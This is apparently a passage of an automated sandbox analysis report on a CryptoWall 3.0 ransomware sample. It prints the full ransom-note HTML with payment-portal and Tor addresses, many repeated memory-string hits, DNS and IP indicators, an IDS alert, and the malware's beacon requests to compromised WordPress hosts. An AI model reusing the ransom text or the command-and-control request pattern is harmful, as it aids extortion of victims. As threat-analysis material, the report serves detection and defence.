them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your 
data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/
Source: svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/Bm
Source: svcmtr.exe, 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: svcmtr.exe, 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your 
data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: notepad.exe, 00000015.00000002.875324829.000000000017E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt48.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt112.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt293.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt119.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt382.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt411.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt327.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt376.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt155.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt379.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt404.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt303.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt133.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt146.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt174.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt292.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt181.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt402.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt397.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt423.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt261.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt384.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt41.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt126.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt291.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt116.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt374.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt229.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt270.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt331.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt413.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt138.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt318.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt182.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt184.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt141.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt83.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt358.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt294.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt375.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt290.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt74.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt33.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt37.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt34.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt26.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt22.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt223.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt28.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt418.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt360.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt353.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt365.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt394.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt77.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt57.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt256.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt243.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt97.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt386.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt309.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt79.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt194.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt239.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt295.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt187.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt11.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt7.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt330.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt381.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt9.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt405.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt391.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt5.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt123.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt81.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt305.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt210.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt159.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt148.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt283.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt27.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt335.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt76.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt132.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt272.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt336.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt380.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt354.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt164.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt385.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt226.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt401.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt111.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt67.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt158.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt233.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt29.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt324.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt6.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt131.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt151.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt124.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt209.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt319.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt167.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt75.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt199.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt80.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt156.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt173.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt301.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt135.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt306.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt351.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt419.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt231.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt168.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt216.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt339.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt263.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt120.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt214.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt325.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt95.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt275.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt410.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt163.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt235.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt185.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt45.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt421.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt18.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt206.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt102.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt154.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt258.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt172.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt392.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt276.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt58.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt165.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt414.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt171.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: restore_files_gpmus.txt396.2.drString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: unknownDNS query: name: zpr5huq4bgmutfnf.onion.to
Source: unknownDNS query: name: zpr5huq4bgmutfnf.tor2web.org
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewIP Address: 103.198.0.111 103.198.0.111
Source: Joe Sandbox ViewIP Address: 185.230.63.171 185.230.63.171
Source: Joe Sandbox ViewASN Name: GVOUS GVOUS
Source: Joe Sandbox ViewASN Name: HOSTINGSERVICES-INCUS HOSTINGSERVICES-INCUS
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49163 -> 34.117.59.81:80
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041A030 _memset,InternetOpenA,_memset,_alldiv,_alldiv,_memset,_memset,_memset,_free,InternetConnectA,InternetConnectA,InternetSetCookieA,HttpOpenRequestA,_memset,HttpSendRequestA,GetLastError,InternetReadFile,strstr,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,_free,ExitThread,0_2_0041A030
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ip[1].txtJump to behavior
Source: global trafficHTTP traffic detected: GET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0Connection: Keep-AliveHost: serenitynowbooksandgifts.com
Source: global trafficHTTP traffic detected: GET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975= HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0Connection: Keep-AliveHost: www.serenitynowbooksandgifts.com
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)Host: ipinfo.io
Source: global trafficHTTP traffic detected: GET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38914A0712A28548CB1A591D5BE2241C135B0E2F3FAB94EEE9E31C6BB0B8D33BD387F667397135C5EC483A155C0151211280780DA7581A2066232DDC3477639D3CA098F5C31FAE7319AB4DAE6A2EF1B042033039ED5685D79F8FCC098B742D884D5394719058E0C8D500DE20140A325CF0B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0Host: fgainterests.comConnection: Keep-Alive
